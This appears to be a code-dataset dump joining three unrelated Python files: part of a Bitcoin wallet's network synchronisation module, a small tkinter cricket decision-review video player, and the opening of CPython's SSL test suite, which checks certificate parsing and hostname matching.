with b.lock: b.update_size()
self.downloading_headers = False
self.downloading_headers = True
t = threading.Thread(target = download_thread)
t.daemon = True
t.start()
def run(self):
self.init_headers_file()
while self.is_running() and self.downloading_headers:
time.sleep(1)
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header_dict):
header_hex, height = header_dict['hex'], header_dict['height']
header = blockchain.deserialize_header(bfh(header_hex), height)
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
b = blockchain.check_header(header)
if b:
interface.blockchain = b
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
tip = max([x.height() for x in self.blockchains.values()])
if tip >=0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.request_header(interface, 0)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain==b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise BaseException('Server did not answer')
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
|
main.py
|
import tkinter
import cv2 # pip install opencv-python
import PIL.Image # pip install pillow
import PIL.ImageTk # pip install pillow
from functools import partial
import threading
import time
import imutils
stream= cv2.VideoCapture('Decision Review System/clip.mp4')
flag = True
def play(speed):
global flag
print(f"You clicked on play. Speed is {speed}")
#Play the video in reverse mode
frame1=stream.get(cv2.CAP_PROP_POS_FRAMES)
stream.set(cv2.CAP_PROP_POS_FRAMES, frame1 + speed)
grabbed, frame = stream.read()
if not grabbed:
exit()
frame= imutils.resize(frame, width =SET_WIDTH, height= SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0, image=frame, anchor= tkinter.NW)
if flag:
canvas.create_text(132, 29, fill= "red", font = "Times 27 bold", text = "Descion Pending")
flag = not flag
def pending(decision):
frame = cv2.cvtColor(cv2.imread("Decision Review System\pending.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor= tkinter.NW)
time.sleep(1)
frame = cv2.cvtColor(cv2.imread("Decision Review System\sponsor.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor= tkinter.NW)
time.sleep(1.5)
if decision=='out':
decisionImg="Decision Review System\out.png"
else:
decisionImg="Decision Review System\img_not_out.png"
frame = cv2.cvtColor(cv2.imread(decisionImg), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor= tkinter.NW)
def out():
thread = threading.Thread(target=pending, args=("out",))
thread.daemon = 1
thread.start()
print("Player is out!")
def not_out():
thread = threading.Thread(target=pending, args=("not out",))
thread.daemon = 1
thread.start()
print("Player is not out!")
# Width and height of our main screen
SET_WIDTH = 650
SET_HEIGHT = 368
# Tkinter GUI starts here
window = tkinter.Tk()
window.title("Third Umpire Decision Review System")
cv_img = cv2.cvtColor(cv2.imread(
"Decision Review System\welcome.png"), cv2.COLOR_BGR2RGB)
canvas = tkinter.Canvas(window, width=SET_WIDTH, height=SET_HEIGHT)
photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas = canvas.create_image(0, 0, ancho=tkinter.NW, image=photo)
canvas.pack()
# Buttons to control playback
btn = tkinter.Button(window, text="<< Previous (FAST)",
width=50, command=partial(play, -25))
btn.pack()
btn = tkinter.Button(window, text="<< Previous (SLOW)",
width=50, command=partial(play, -2))
btn.pack()
btn = tkinter.Button(window, text="Next (FAST)>>",
width=50, command=partial(play, 25))
btn.pack()
btn = tkinter.Button(window, text="Next (SLOW)>>",
width=50, command=partial(play, 2))
btn.pack()
btn = tkinter.Button(window, text="Give Out", width=50, command=out)
btn.pack()
btn = tkinter.Button(window, text="Give Not Out", width=50, command=not_out)
btn.pack()
window.mainloop()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
import warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import asyncore
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
support.check_disallow_instantiation(self, _ssl.Certificate)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'{protocol!r} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
self.assertEqual(
f'ssl.{version!r} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
